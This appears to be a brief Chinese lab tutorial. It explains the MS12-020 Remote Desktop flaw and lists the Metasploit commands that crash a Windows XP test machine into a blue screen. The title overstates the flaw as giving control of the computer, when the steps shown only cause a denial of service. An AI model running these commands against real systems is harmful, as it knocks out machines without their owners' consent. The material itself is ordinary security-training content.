黑客是如何利用MS12-020漏洞控制你的计算机的？

一、漏洞介绍

又名：死亡蓝屏。这是远程桌面协议中两个秘密报告的漏洞。如果攻击者向受影响的系统发送一系列特制 RDP 数据包，则这些漏洞中较严重的漏洞可能允许远程执行代码。默认情况下，任何 Windows 操作系统都未启用远程桌面协议 (RDP)。没有启用 RDP 的系统不受威胁。

二、资源装备

1.安装好Kali Linux的虚拟机一台；

2.Windows xp 计算机一台。

3.整装待发的小白一个。

二、攻防实战

2.1 在kali中启动MSF。

打开终端 键入命令：msfconsole

2.2 配置相关参数

①键入命令：search ms12-020

②复制msf返回的命令前加use：use

auxiliary/dos/windows/rdp/ms12_020_maxchannellid

③显示需要配置的参数 ：show options

⑤设置靶机（win xp）IP地址 set rhosts 192.168.xxx.xxx

⑥设置本机（kali） IP地址 set lhost 192.168.xxx.xxx

⑦运行payload键入命令：exploit

2.3 攻击成功靶机蓝屏